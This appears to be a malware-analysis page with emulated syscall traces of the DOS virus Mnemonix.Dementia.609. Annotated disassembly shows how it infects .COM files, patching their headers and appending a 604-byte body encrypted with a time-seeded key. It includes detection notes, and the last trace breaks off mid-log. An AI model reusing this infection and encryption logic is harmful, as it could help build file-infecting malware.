Sample viewer

vx.netlux.org/Virus.DOS.Mnemonix.Dementia.609


Syscalls:

Time Syscall Op Syscall Name
; Disassembly window following the Get date call: optional directory change,
; then the first file search. INT 21h is the DOS service interrupt; the service
; is selected by AH. BP is used as the base for the code's own data; the
; contents of the strings/buffers it points at are not shown in this trace.
; In the runs on this page, the closing "Change current directory" row at
; PC 12c61 appears only when the Get/Change current directory rows below do.
2018-12-17T22:50:52.040438594Z 42 PC: 12ac8 | Get date 0x12ac8: cmp al, 2    ; AL as returned by Get date (AH=2Ah): day of week, 0 = Sunday, per the DOS API
0x12aca: ja 0x12aea                  ; AL > 2 (unsigned): skip the directory save/change
0x12acc: mov ah, 0x47                ; AH=47h: get current directory
0x12ace: mov dl, 0                   ; DL=0: default drive
0x12ad0: mov si, bp
0x12ad2: add si, 0x210               ; DS:SI = buffer at BP+0x210 that receives the current path
0x12ad6: int 0x21
0x12ad8: mov dx, bp
0x12ada: add dx, 0x206               ; DS:DX = path string at BP+0x206
0x12ade: mov ah, 0x3b                ; AH=3Bh: change current directory
0x12ae0: int 0x21
0x12ae2: mov bx, bp
0x12ae4: add bx, 0x24f
0x12ae8: inc byte ptr [bx]           ; bump the byte at BP+0x24f; presumably marks "directory was changed" -- confirm
0x12aea: mov ah, 0x4e                ; AH=4Eh: find first file
0x12aec: xor cx, cx                  ; CX=0: attribute mask 0
0x12aee: mov dx, bp
0x12af0: add dx, 0x209               ; DS:DX = search pattern at BP+0x209
0x12af4: int 0x21
0x12af6: jb 0x12afe                  ; CF set: the search failed / found nothing
2018-12-17T22:50:52.043084755Z 71 PC: 12ad8 | Get current directory
2018-12-17T22:50:52.046762675Z 59 PC: 12ae2 | Change current directory
2018-12-17T22:50:52.051132053Z 78 PC: 12af6 | Find first file
2018-12-17T22:50:52.057387264Z 61 PC: 12b98 | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:50:52.065378407Z 63 PC: 12ba7 | Read file or device (Read 5 bytes on handle 5)
2018-12-17T22:50:52.072586668Z 66 PC: 12bd1 | Move file pointer
2018-12-17T22:50:52.074532584Z 64 PC: 12bde | Write file or device (Write 5 bytes on handle 5)
2018-12-17T22:50:52.078327433Z 66 PC: 12be7 | Move file pointer
2018-12-17T22:50:52.080012929Z 64 PC: 12bf4 | Write file or device (Write 5 bytes on handle 5)
; Disassembly window between Get time and the 604-byte write: it builds the
; buffer that the next Write row puts into the opened file. 0x2E bytes are
; copied unchanged, then 0x117 words are rewritten with a running 16-bit key;
; 0x2E + 2*0x117 = 0x25C = 604, the length written at PC 12c3a.
; SI, DI, BX and the pushed value popped at 0x12c2c are set up outside this window.
; Detection note: the key is seeded from the clock (and, it appears, a per-file
; value), so the 0x117 rewritten words will differ from file to file; the bytes
; copied unchanged are the likelier place to find stable signature material --
; verify against several infected samples.
2018-12-17T22:50:52.082991826Z 44 PC: 12c0a | Get time 0x12c0a: mov ah, dh    ; DH = seconds if Get time (AH=2Ch) returned the usual registers; AH is not read again in this window
0x12c0c: add dx, word ptr [bx + 2]   ; DX (seconds:hundredths from Get time) += word at [BX+2]
0x12c0f: mov word ptr [bx + 2], dx   ; store it back; DX is the per-word key step used below
0x12c12: mov cx, word ptr [0x9a]     ; NOTE(review): DS:0x9A is the file-size field of the default DTA (PSP:0x80 + 0x1A) if DS = PSP and the DTA was not moved -- confirm
0x12c16: add cx, word ptr [bx]
0x12c18: mov word ptr [bx], cx       ; word at [BX] += the value loaded from DS:0x9A
0x12c1a: mov bx, cx                  ; BX = starting key for the loop
0x12c1c: mov cx, 0x2e
0x12c1f: rep movsb byte ptr es:[di], byte ptr [si]    ; copy 0x2E (46) bytes DS:SI -> ES:DI unchanged
0x12c21: mov cx, 0x117               ; 0x117 (279) words to rewrite
0x12c24: lodsw ax, word ptr [si]     ; AX = next source word
0x12c25: sub ax, bx                  ; subtract the current key
0x12c27: sub bx, dx                  ; key -= step, so every word gets a different key
0x12c29: stosw word ptr es:[di], ax  ; store the rewritten word
0x12c2a: loop 0x12c24
0x12c2c: pop bx                      ; restore BX saved outside this window (the Write row that follows reports handle 5)
0x12c2d: mov dx, bp
0x12c2f: add dx, 0x3e6               ; DS:DX = buffer at BP+0x3E6
0x12c33: mov cx, 0x25c               ; CX = 0x25C = 604 bytes
0x12c36: mov ah, 0x40                ; AH=40h: write to file handle
2018-12-17T22:50:52.086525905Z 64 PC: 12c3a | Write file or device (Write 604 bytes on handle 5)
2018-12-17T22:50:52.101318074Z 87 PC: 12c47 | Get or set file date and time
2018-12-17T22:50:52.102957153Z 62 PC: 12c4b | Close file
2018-12-17T22:50:52.110829533Z 79 PC: 12b05 | Find next file
2018-12-17T22:50:52.114980962Z 61 PC: 12b98 | Open file (Filename = 'PRINT.COM')
2018-12-17T22:50:52.122115104Z 63 PC: 12ba7 | Read file or device (Read 5 bytes on handle 5)
2018-12-17T22:50:52.128928845Z 66 PC: 12bd1 | Move file pointer
2018-12-17T22:50:52.131616954Z 64 PC: 12bde | Write file or device (Write 5 bytes on handle 5)
2018-12-17T22:50:52.134864906Z 66 PC: 12be7 | Move file pointer
2018-12-17T22:50:52.13655931Z 64 PC: 12bf4 | Write file or device (Write 5 bytes on handle 5)
2018-12-17T22:50:52.140320716Z 44 PC: 12c0a | Get time 0x12c0a: mov ah, dh
0x12c0c: add dx, word ptr [bx + 2]
0x12c0f: mov word ptr [bx + 2], dx
0x12c12: mov cx, word ptr [0x9a]
0x12c16: add cx, word ptr [bx]
0x12c18: mov word ptr [bx], cx
0x12c1a: mov bx, cx
0x12c1c: mov cx, 0x2e
0x12c1f: rep movsb byte ptr es:[di], byte ptr [si]
0x12c21: mov cx, 0x117
0x12c24: lodsw ax, word ptr [si]
0x12c25: sub ax, bx
0x12c27: sub bx, dx
0x12c29: stosw word ptr es:[di], ax
0x12c2a: loop 0x12c24
0x12c2c: pop bx
0x12c2d: mov dx, bp
0x12c2f: add dx, 0x3e6
0x12c33: mov cx, 0x25c
0x12c36: mov ah, 0x40
2018-12-17T22:50:52.142735242Z 64 PC: 12c3a | Write file or device (Write 604 bytes on handle 5)
2018-12-17T22:50:52.151123049Z 87 PC: 12c47 | Get or set file date and time
2018-12-17T22:50:52.153895638Z 62 PC: 12c4b | Close file
2018-12-17T22:50:52.162383363Z 79 PC: 12b05 | Find next file
2018-12-17T22:50:52.165298731Z 61 PC: 12b98 | Open file (Filename = 'HELLO.COM')
2018-12-17T22:50:52.172813728Z 63 PC: 12ba7 | Read file or device (Read 5 bytes on handle 5)
2018-12-17T22:50:52.184606884Z 66 PC: 12bd1 | Move file pointer
2018-12-17T22:50:52.186604837Z 64 PC: 12bde | Write file or device (Write 5 bytes on handle 5)
2018-12-17T22:50:52.189893535Z 66 PC: 12be7 | Move file pointer
2018-12-17T22:50:52.192920772Z 64 PC: 12bf4 | Write file or device (Write 5 bytes on handle 5)
2018-12-17T22:50:52.19644351Z 44 PC: 12c0a | Get time 0x12c0a: mov ah, dh
0x12c0c: add dx, word ptr [bx + 2]
0x12c0f: mov word ptr [bx + 2], dx
0x12c12: mov cx, word ptr [0x9a]
0x12c16: add cx, word ptr [bx]
0x12c18: mov word ptr [bx], cx
0x12c1a: mov bx, cx
0x12c1c: mov cx, 0x2e
0x12c1f: rep movsb byte ptr es:[di], byte ptr [si]
0x12c21: mov cx, 0x117
0x12c24: lodsw ax, word ptr [si]
0x12c25: sub ax, bx
0x12c27: sub bx, dx
0x12c29: stosw word ptr es:[di], ax
0x12c2a: loop 0x12c24
0x12c2c: pop bx
0x12c2d: mov dx, bp
0x12c2f: add dx, 0x3e6
0x12c33: mov cx, 0x25c
0x12c36: mov ah, 0x40
2018-12-17T22:50:52.199594209Z 64 PC: 12c3a | Write file or device (Write 604 bytes on handle 5)
2018-12-17T22:50:52.209504176Z 87 PC: 12c47 | Get or set file date and time
2018-12-17T22:50:52.211370412Z 62 PC: 12c4b | Close file
2018-12-17T22:50:52.220270903Z 79 PC: 12b05 | Find next file
2018-12-17T22:50:52.224879602Z 61 PC: 12b98 | Open file (Filename = 'PHANG.COM')
2018-12-17T22:50:52.231807546Z 63 PC: 12ba7 | Read file or device (Read 5 bytes on handle 5)
2018-12-17T22:50:52.238485281Z 66 PC: 12bd1 | Move file pointer
2018-12-17T22:50:52.240620593Z 64 PC: 12bde | Write file or device (Write 5 bytes on handle 5)
2018-12-17T22:50:52.243657107Z 66 PC: 12be7 | Move file pointer
2018-12-17T22:50:52.246230282Z 64 PC: 12bf4 | Write file or device (Write 5 bytes on handle 5)
2018-12-17T22:50:52.249954458Z 44 PC: 12c0a | Get time 0x12c0a: mov ah, dh
0x12c0c: add dx, word ptr [bx + 2]
0x12c0f: mov word ptr [bx + 2], dx
0x12c12: mov cx, word ptr [0x9a]
0x12c16: add cx, word ptr [bx]
0x12c18: mov word ptr [bx], cx
0x12c1a: mov bx, cx
0x12c1c: mov cx, 0x2e
0x12c1f: rep movsb byte ptr es:[di], byte ptr [si]
0x12c21: mov cx, 0x117
0x12c24: lodsw ax, word ptr [si]
0x12c25: sub ax, bx
0x12c27: sub bx, dx
0x12c29: stosw word ptr es:[di], ax
0x12c2a: loop 0x12c24
0x12c2c: pop bx
0x12c2d: mov dx, bp
0x12c2f: add dx, 0x3e6
0x12c33: mov cx, 0x25c
0x12c36: mov ah, 0x40
2018-12-17T22:50:52.25358632Z 64 PC: 12c3a | Write file or device (Write 604 bytes on handle 5)
2018-12-17T22:50:52.268737384Z 87 PC: 12c47 | Get or set file date and time
2018-12-17T22:50:52.271508009Z 62 PC: 12c4b | Close file
2018-12-17T22:50:52.281733098Z 79 PC: 12b05 | Find next file
2018-12-17T22:50:52.28510362Z 61 PC: 12b98 | Open file (Filename = 'PRINTA~1.COM')
2018-12-17T22:50:52.292701574Z 63 PC: 12ba7 | Read file or device (Read 5 bytes on handle 5)
2018-12-17T22:50:52.300515674Z 66 PC: 12bd1 | Move file pointer
2018-12-17T22:50:52.302386047Z 64 PC: 12bde | Write file or device (Write 5 bytes on handle 5)
2018-12-17T22:50:52.305436979Z 66 PC: 12be7 | Move file pointer
2018-12-17T22:50:52.307784529Z 64 PC: 12bf4 | Write file or device (Write 5 bytes on handle 5)
2018-12-17T22:50:52.311183765Z 44 PC: 12c0a | Get time 0x12c0a: mov ah, dh
0x12c0c: add dx, word ptr [bx + 2]
0x12c0f: mov word ptr [bx + 2], dx
0x12c12: mov cx, word ptr [0x9a]
0x12c16: add cx, word ptr [bx]
0x12c18: mov word ptr [bx], cx
0x12c1a: mov bx, cx
0x12c1c: mov cx, 0x2e
0x12c1f: rep movsb byte ptr es:[di], byte ptr [si]
0x12c21: mov cx, 0x117
0x12c24: lodsw ax, word ptr [si]
0x12c25: sub ax, bx
0x12c27: sub bx, dx
0x12c29: stosw word ptr es:[di], ax
0x12c2a: loop 0x12c24
0x12c2c: pop bx
0x12c2d: mov dx, bp
0x12c2f: add dx, 0x3e6
0x12c33: mov cx, 0x25c
0x12c36: mov ah, 0x40
2018-12-17T22:50:52.313791454Z 64 PC: 12c3a | Write file or device (Write 604 bytes on handle 5)
2018-12-17T22:50:52.323277094Z 87 PC: 12c47 | Get or set file date and time
2018-12-17T22:50:52.326103474Z 62 PC: 12c4b | Close file
2018-12-17T22:50:52.334721093Z 79 PC: 12b05 | Find next file
2018-12-17T22:50:52.33804612Z 61 PC: 12b98 | Open file (Filename = 'MANDEL.COM')
2018-12-17T22:50:52.346356281Z 63 PC: 12ba7 | Read file or device (Read 5 bytes on handle 5)
2018-12-17T22:50:52.353317469Z 66 PC: 12bd1 | Move file pointer
2018-12-17T22:50:52.355142928Z 64 PC: 12bde | Write file or device (Write 5 bytes on handle 5)
2018-12-17T22:50:52.359175224Z 66 PC: 12be7 | Move file pointer
2018-12-17T22:50:52.36190957Z 64 PC: 12bf4 | Write file or device (Write 5 bytes on handle 5)
2018-12-17T22:50:52.365090195Z 44 PC: 12c0a | Get time 0x12c0a: mov ah, dh
0x12c0c: add dx, word ptr [bx + 2]
0x12c0f: mov word ptr [bx + 2], dx
0x12c12: mov cx, word ptr [0x9a]
0x12c16: add cx, word ptr [bx]
0x12c18: mov word ptr [bx], cx
0x12c1a: mov bx, cx
0x12c1c: mov cx, 0x2e
0x12c1f: rep movsb byte ptr es:[di], byte ptr [si]
0x12c21: mov cx, 0x117
0x12c24: lodsw ax, word ptr [si]
0x12c25: sub ax, bx
0x12c27: sub bx, dx
0x12c29: stosw word ptr es:[di], ax
0x12c2a: loop 0x12c24
0x12c2c: pop bx
0x12c2d: mov dx, bp
0x12c2f: add dx, 0x3e6
0x12c33: mov cx, 0x25c
0x12c36: mov ah, 0x40
2018-12-17T22:50:52.368810555Z 64 PC: 12c3a | Write file or device (Write 604 bytes on handle 5)
2018-12-17T22:50:52.378312917Z 87 PC: 12c47 | Get or set file date and time
2018-12-17T22:50:52.380248372Z 62 PC: 12c4b | Close file
2018-12-17T22:50:52.390053252Z 79 PC: 12b05 | Find next file
2018-12-17T22:50:52.394286124Z 61 PC: 12b98 | Open file (Filename = 'PAH.COM')
2018-12-17T22:50:52.402309547Z 63 PC: 12ba7 | Read file or device (Read 5 bytes on handle 5)
2018-12-17T22:50:52.409173132Z 66 PC: 12bd1 | Move file pointer
2018-12-17T22:50:52.411085474Z 64 PC: 12bde | Write file or device (Write 5 bytes on handle 5)
2018-12-17T22:50:52.413878331Z 66 PC: 12be7 | Move file pointer
2018-12-17T22:50:52.415771918Z 64 PC: 12bf4 | Write file or device (Write 5 bytes on handle 5)
2018-12-17T22:50:52.419441522Z 44 PC: 12c0a | Get time 0x12c0a: mov ah, dh
0x12c0c: add dx, word ptr [bx + 2]
0x12c0f: mov word ptr [bx + 2], dx
0x12c12: mov cx, word ptr [0x9a]
0x12c16: add cx, word ptr [bx]
0x12c18: mov word ptr [bx], cx
0x12c1a: mov bx, cx
0x12c1c: mov cx, 0x2e
0x12c1f: rep movsb byte ptr es:[di], byte ptr [si]
0x12c21: mov cx, 0x117
0x12c24: lodsw ax, word ptr [si]
0x12c25: sub ax, bx
0x12c27: sub bx, dx
0x12c29: stosw word ptr es:[di], ax
0x12c2a: loop 0x12c24
0x12c2c: pop bx
0x12c2d: mov dx, bp
0x12c2f: add dx, 0x3e6
0x12c33: mov cx, 0x25c
0x12c36: mov ah, 0x40
2018-12-17T22:50:52.421868251Z 64 PC: 12c3a | Write file or device (Write 604 bytes on handle 5)
2018-12-17T22:50:52.430436478Z 87 PC: 12c47 | Get or set file date and time
2018-12-17T22:50:52.433249252Z 62 PC: 12c4b | Close file
2018-12-17T22:50:52.441518316Z 79 PC: 12b05 | Find next file
2018-12-17T22:50:52.444447268Z 61 PC: 12b98 | Open file (Filename = 'TEST.COM')
2018-12-17T22:50:52.452410308Z 63 PC: 12ba7 | Read file or device (Read 5 bytes on handle 5)
2018-12-17T22:50:52.456368775Z 87 PC: 12c47 | Get or set file date and time
2018-12-17T22:50:52.45845784Z 62 PC: 12c4b | Close file
2018-12-17T22:50:52.466958218Z 79 PC: 12b05 | Find next file
2018-12-17T22:50:52.469843128Z 59 PC: 12c61 | Change current directory
2018-12-17T22:50:52.474595777Z 76 PC: 12a45 | Terminate with return code (Return code = '1')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":10363,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:27:49.164913883Z 42 PC: 12ac8 | Get date 0x12ac8: cmp al, 2
0x12aca: ja 0x12aea
0x12acc: mov ah, 0x47
0x12ace: mov dl, 0
0x12ad0: mov si, bp
0x12ad2: add si, 0x210
0x12ad6: int 0x21
0x12ad8: mov dx, bp
0x12ada: add dx, 0x206
0x12ade: mov ah, 0x3b
0x12ae0: int 0x21
0x12ae2: mov bx, bp
0x12ae4: add bx, 0x24f
0x12ae8: inc byte ptr [bx]
0x12aea: mov ah, 0x4e
0x12aec: xor cx, cx
0x12aee: mov dx, bp
0x12af0: add dx, 0x209
0x12af4: int 0x21
0x12af6: jb 0x12afe
2018-12-25T12:27:49.16728472Z 71 PC: 12ad8 | Get current directory
2018-12-25T12:27:49.171038516Z 59 PC: 12ae2 | Change current directory
2018-12-25T12:27:49.189378016Z 78 PC: 12af6 | Find first file
2018-12-25T12:27:49.196667275Z 61 PC: 12b98 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:27:49.213213034Z 63 PC: 12ba7 | Read file or device (Read 5 bytes on handle 5)
2018-12-25T12:27:49.228408575Z 66 PC: 12bd1 | Move file pointer
2018-12-25T12:27:49.230047116Z 64 PC: 12bde | Write file or device (Write 5 bytes on handle 5)
2018-12-25T12:27:49.237722674Z 66 PC: 12be7 | Move file pointer
2018-12-25T12:27:49.239640611Z 64 PC: 12bf4 | Write file or device (Write 5 bytes on handle 5)
2018-12-25T12:27:49.243131217Z 44 PC: 12c0a | Get time 0x12c0a: mov ah, dh
0x12c0c: add dx, word ptr [bx + 2]
0x12c0f: mov word ptr [bx + 2], dx
0x12c12: mov cx, word ptr [0x9a]
0x12c16: add cx, word ptr [bx]
0x12c18: mov word ptr [bx], cx
0x12c1a: mov bx, cx
0x12c1c: mov cx, 0x2e
0x12c1f: rep movsb byte ptr es:[di], byte ptr [si]
0x12c21: mov cx, 0x117
0x12c24: lodsw ax, word ptr [si]
0x12c25: sub ax, bx
0x12c27: sub bx, dx
0x12c29: stosw word ptr es:[di], ax
0x12c2a: loop 0x12c24
0x12c2c: pop bx
0x12c2d: mov dx, bp
0x12c2f: add dx, 0x3e6
0x12c33: mov cx, 0x25c
0x12c36: mov ah, 0x40
2018-12-25T12:27:49.247611536Z 64 PC: 12c3a | Write file or device (Write 604 bytes on handle 5)
2018-12-25T12:27:49.262610798Z 87 PC: 12c47 | Get or set file date and time
2018-12-25T12:27:49.264645191Z 62 PC: 12c4b | Close file
2018-12-25T12:27:49.273514044Z 79 PC: 12b05 | Find next file
2018-12-25T12:27:49.277604986Z 61 PC: 12b98 | Open file (See above)
2018-12-25T12:27:49.285065557Z 63 PC: 12ba7 | Read file or device (See above)
2018-12-25T12:27:49.292447143Z 66 PC: 12bd1 | Move file pointer (See above)
2018-12-25T12:27:49.295141955Z 64 PC: 12bde | Write file or device (See above)
2018-12-25T12:27:49.298116476Z 66 PC: 12be7 | Move file pointer (See above)
2018-12-25T12:27:49.299734484Z 64 PC: 12bf4 | Write file or device (See above)
2018-12-25T12:27:49.309162015Z 44 PC: 12c0a | Get time (See above)
2018-12-25T12:27:49.31224988Z 64 PC: 12c3a | Write file or device (See above)
2018-12-25T12:27:49.321835822Z 87 PC: 12c47 | Get or set file date and time (See above)
2018-12-25T12:27:49.324428269Z 62 PC: 12c4b | Close file (See above)
2018-12-25T12:27:49.333748688Z 79 PC: 12b05 | Find next file (See above)
2018-12-25T12:27:49.336742623Z 61 PC: 12b98 | Open file (See above)
2018-12-25T12:27:49.348993015Z 63 PC: 12ba7 | Read file or device (See above)
2018-12-25T12:27:49.356404263Z 66 PC: 12bd1 | Move file pointer (See above)
2018-12-25T12:27:49.358092594Z 64 PC: 12bde | Write file or device (See above)
2018-12-25T12:27:49.377286477Z 66 PC: 12be7 | Move file pointer (See above)
2018-12-25T12:27:49.384358698Z 64 PC: 12bf4 | Write file or device (See above)
2018-12-25T12:27:49.387727022Z 44 PC: 12c0a | Get time (See above)
2018-12-25T12:27:49.390679018Z 64 PC: 12c3a | Write file or device (See above)
2018-12-25T12:27:49.400936586Z 87 PC: 12c47 | Get or set file date and time (See above)
2018-12-25T12:27:49.403180212Z 62 PC: 12c4b | Close file (See above)
2018-12-25T12:27:49.412280617Z 79 PC: 12b05 | Find next file (See above)
2018-12-25T12:27:49.416498592Z 61 PC: 12b98 | Open file (See above)
2018-12-25T12:27:49.423879652Z 63 PC: 12ba7 | Read file or device (See above)
2018-12-25T12:27:49.431144189Z 66 PC: 12bd1 | Move file pointer (See above)
2018-12-25T12:27:49.433451818Z 64 PC: 12bde | Write file or device (See above)
2018-12-25T12:27:49.436808533Z 66 PC: 12be7 | Move file pointer (See above)
2018-12-25T12:27:49.438891186Z 64 PC: 12bf4 | Write file or device (See above)
2018-12-25T12:27:49.443066855Z 44 PC: 12c0a | Get time (See above)
2018-12-25T12:27:49.446076117Z 64 PC: 12c3a | Write file or device (See above)
2018-12-25T12:27:49.455260435Z 87 PC: 12c47 | Get or set file date and time (See above)
2018-12-25T12:27:49.45803235Z 62 PC: 12c4b | Close file (See above)
2018-12-25T12:27:49.467967257Z 79 PC: 12b05 | Find next file (See above)
2018-12-25T12:27:49.471333541Z 61 PC: 12b98 | Open file (See above)
2018-12-25T12:27:49.47964915Z 63 PC: 12ba7 | Read file or device (See above)
2018-12-25T12:27:49.487094798Z 66 PC: 12bd1 | Move file pointer (See above)
2018-12-25T12:27:49.489092108Z 64 PC: 12bde | Write file or device (See above)
2018-12-25T12:27:49.492687375Z 66 PC: 12be7 | Move file pointer (See above)
2018-12-25T12:27:49.494985066Z 64 PC: 12bf4 | Write file or device (See above)
2018-12-25T12:27:49.498397123Z 44 PC: 12c0a | Get time (See above)
2018-12-25T12:27:49.501463616Z 64 PC: 12c3a | Write file or device (See above)
2018-12-25T12:27:49.510655355Z 87 PC: 12c47 | Get or set file date and time (See above)
2018-12-25T12:27:49.512567042Z 62 PC: 12c4b | Close file (See above)
2018-12-25T12:27:49.52166777Z 79 PC: 12b05 | Find next file (See above)
2018-12-25T12:27:49.525068964Z 61 PC: 12b98 | Open file (See above)
2018-12-25T12:27:49.532536332Z 63 PC: 12ba7 | Read file or device (See above)
2018-12-25T12:27:49.540297217Z 66 PC: 12bd1 | Move file pointer (See above)
2018-12-25T12:27:49.542756249Z 64 PC: 12bde | Write file or device (See above)
2018-12-25T12:27:49.54613656Z 66 PC: 12be7 | Move file pointer (See above)
2018-12-25T12:27:49.548133974Z 64 PC: 12bf4 | Write file or device (See above)
2018-12-25T12:27:49.552149883Z 44 PC: 12c0a | Get time (See above)
2018-12-25T12:27:49.555064327Z 64 PC: 12c3a | Write file or device (See above)
2018-12-25T12:27:49.565047968Z 87 PC: 12c47 | Get or set file date and time (See above)
2018-12-25T12:27:49.567868442Z 62 PC: 12c4b | Close file (See above)
2018-12-25T12:27:49.576575113Z 79 PC: 12b05 | Find next file (See above)
2018-12-25T12:27:49.579771748Z 61 PC: 12b98 | Open file (See above)
2018-12-25T12:27:49.587892131Z 63 PC: 12ba7 | Read file or device (See above)
2018-12-25T12:27:49.595104797Z 66 PC: 12bd1 | Move file pointer (See above)
2018-12-25T12:27:49.596914856Z 64 PC: 12bde | Write file or device (See above)
2018-12-25T12:27:49.60066007Z 66 PC: 12be7 | Move file pointer (See above)
2018-12-25T12:27:49.603484795Z 64 PC: 12bf4 | Write file or device (See above)
2018-12-25T12:27:49.606797808Z 44 PC: 12c0a | Get time (See above)
2018-12-25T12:27:49.609962344Z 64 PC: 12c3a | Write file or device (See above)
2018-12-25T12:27:49.619097673Z 87 PC: 12c47 | Get or set file date and time (See above)
2018-12-25T12:27:49.621156768Z 62 PC: 12c4b | Close file (See above)
2018-12-25T12:27:49.629686841Z 79 PC: 12b05 | Find next file (See above)
2018-12-25T12:27:49.633750131Z 61 PC: 12b98 | Open file (See above)
2018-12-25T12:27:49.64121042Z 63 PC: 12ba7 | Read file or device (See above)
2018-12-25T12:27:49.644429842Z 87 PC: 12c47 | Get or set file date and time (See above)
2018-12-25T12:27:49.647853032Z 62 PC: 12c4b | Close file (See above)
2018-12-25T12:27:49.655730681Z 79 PC: 12b05 | Find next file (See above)
2018-12-25T12:27:49.658800694Z 59 PC: 12c61 | Change current directory
2018-12-25T12:27:49.664629196Z 76 PC: 12a45 | Terminate with return code (Return code = '1')

{"DateBased":true,"Day":2,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":10363,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
; Same disassembly window as in the other runs, but in this run the log goes
; from Get date straight to Find first file: no Get/Change current directory
; rows follow, and there is no closing Change current directory at PC 12c61.
; That is the behaviour when the `ja` at 0x12aca is taken (AL > 2 after Get date).
2018-12-25T12:27:49.860362602Z 42 PC: 12ac8 | Get date 0x12ac8: cmp al, 2    ; AL as returned by Get date (AH=2Ah): day of week, 0 = Sunday, per the DOS API
0x12aca: ja 0x12aea                  ; AL > 2 (unsigned): skip the directory save/change
0x12acc: mov ah, 0x47                ; AH=47h: get current directory
0x12ace: mov dl, 0                   ; DL=0: default drive
0x12ad0: mov si, bp
0x12ad2: add si, 0x210               ; DS:SI = buffer at BP+0x210 that receives the current path
0x12ad6: int 0x21
0x12ad8: mov dx, bp
0x12ada: add dx, 0x206               ; DS:DX = path string at BP+0x206
0x12ade: mov ah, 0x3b                ; AH=3Bh: change current directory
0x12ae0: int 0x21
0x12ae2: mov bx, bp
0x12ae4: add bx, 0x24f
0x12ae8: inc byte ptr [bx]           ; bump the byte at BP+0x24f; presumably marks "directory was changed" -- confirm
0x12aea: mov ah, 0x4e                ; AH=4Eh: find first file
0x12aec: xor cx, cx                  ; CX=0: attribute mask 0
0x12aee: mov dx, bp
0x12af0: add dx, 0x209               ; DS:DX = search pattern at BP+0x209
0x12af4: int 0x21
0x12af6: jb 0x12afe                  ; CF set: the search failed / found nothing
2018-12-25T12:27:49.866851864Z 78 PC: 12af6 | Find first file
2018-12-25T12:27:49.872926497Z 61 PC: 12b98 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:27:49.879331427Z 63 PC: 12ba7 | Read file or device (Read 5 bytes on handle 5)
2018-12-25T12:27:49.885792452Z 66 PC: 12bd1 | Move file pointer
2018-12-25T12:27:49.889554403Z 64 PC: 12bde | Write file or device (Write 5 bytes on handle 5)
2018-12-25T12:27:49.892013565Z 66 PC: 12be7 | Move file pointer
2018-12-25T12:27:49.893640286Z 64 PC: 12bf4 | Write file or device (Write 5 bytes on handle 5)
2018-12-25T12:27:49.897029536Z 44 PC: 12c0a | Get time 0x12c0a: mov ah, dh
0x12c0c: add dx, word ptr [bx + 2]
0x12c0f: mov word ptr [bx + 2], dx
0x12c12: mov cx, word ptr [0x9a]
0x12c16: add cx, word ptr [bx]
0x12c18: mov word ptr [bx], cx
0x12c1a: mov bx, cx
0x12c1c: mov cx, 0x2e
0x12c1f: rep movsb byte ptr es:[di], byte ptr [si]
0x12c21: mov cx, 0x117
0x12c24: lodsw ax, word ptr [si]
0x12c25: sub ax, bx
0x12c27: sub bx, dx
0x12c29: stosw word ptr es:[di], ax
0x12c2a: loop 0x12c24
0x12c2c: pop bx
0x12c2d: mov dx, bp
0x12c2f: add dx, 0x3e6
0x12c33: mov cx, 0x25c
0x12c36: mov ah, 0x40
2018-12-25T12:27:49.899192187Z 64 PC: 12c3a | Write file or device (Write 604 bytes on handle 5)
2018-12-25T12:27:49.913458503Z 87 PC: 12c47 | Get or set file date and time
2018-12-25T12:27:49.91588746Z 62 PC: 12c4b | Close file
2018-12-25T12:27:49.923237906Z 79 PC: 12b05 | Find next file
2018-12-25T12:27:49.92599452Z 61 PC: 12b98 | Open file (See above)
2018-12-25T12:27:49.9333233Z 63 PC: 12ba7 | Read file or device (See above)
2018-12-25T12:27:49.93978424Z 66 PC: 12bd1 | Move file pointer (See above)
2018-12-25T12:27:49.941051975Z 64 PC: 12bde | Write file or device (See above)
2018-12-25T12:27:49.944396137Z 66 PC: 12be7 | Move file pointer (See above)
2018-12-25T12:27:49.945766365Z 64 PC: 12bf4 | Write file or device (See above)
2018-12-25T12:27:49.948385263Z 44 PC: 12c0a | Get time (See above)
2018-12-25T12:27:49.951797742Z 64 PC: 12c3a | Write file or device (See above)
2018-12-25T12:27:49.959689806Z 87 PC: 12c47 | Get or set file date and time (See above)
2018-12-25T12:27:49.961814564Z 62 PC: 12c4b | Close file (See above)
2018-12-25T12:27:49.970427794Z 79 PC: 12b05 | Find next file (See above)
2018-12-25T12:27:49.973096929Z 61 PC: 12b98 | Open file (See above)
2018-12-25T12:27:49.984992838Z 63 PC: 12ba7 | Read file or device (See above)
2018-12-25T12:27:49.994181529Z 66 PC: 12bd1 | Move file pointer (See above)
2018-12-25T12:27:49.996696877Z 64 PC: 12bde | Write file or device (See above)
2018-12-25T12:27:49.999141715Z 66 PC: 12be7 | Move file pointer (See above)
2018-12-25T12:27:50.000885454Z 64 PC: 12bf4 | Write file or device (See above)
2018-12-25T12:27:50.00402842Z 44 PC: 12c0a | Get time (See above)
2018-12-25T12:27:50.006496454Z 64 PC: 12c3a | Write file or device (See above)
2018-12-25T12:27:50.015197692Z 87 PC: 12c47 | Get or set file date and time (See above)
2018-12-25T12:27:50.017009778Z 62 PC: 12c4b | Close file (See above)
2018-12-25T12:27:50.024694586Z 79 PC: 12b05 | Find next file (See above)
2018-12-25T12:27:50.027812192Z 61 PC: 12b98 | Open file (See above)
2018-12-25T12:27:50.035436536Z 63 PC: 12ba7 | Read file or device (See above)
2018-12-25T12:27:50.041946442Z 66 PC: 12bd1 | Move file pointer (See above)
2018-12-25T12:27:50.043668123Z 64 PC: 12bde | Write file or device (See above)
2018-12-25T12:27:50.047553459Z 66 PC: 12be7 | Move file pointer (See above)
2018-12-25T12:27:50.049262897Z 64 PC: 12bf4 | Write file or device (See above)
2018-12-25T12:27:50.052917054Z 44 PC: 12c0a | Get time (See above)
2018-12-25T12:27:50.056751209Z 64 PC: 12c3a | Write file or device (See above)
2018-12-25T12:27:50.0648876Z 87 PC: 12c47 | Get or set file date and time (See above)
2018-12-25T12:27:50.066552222Z 62 PC: 12c4b | Close file (See above)
2018-12-25T12:27:50.075075364Z 79 PC: 12b05 | Find next file (See above)
2018-12-25T12:27:50.078103732Z 61 PC: 12b98 | Open file (See above)
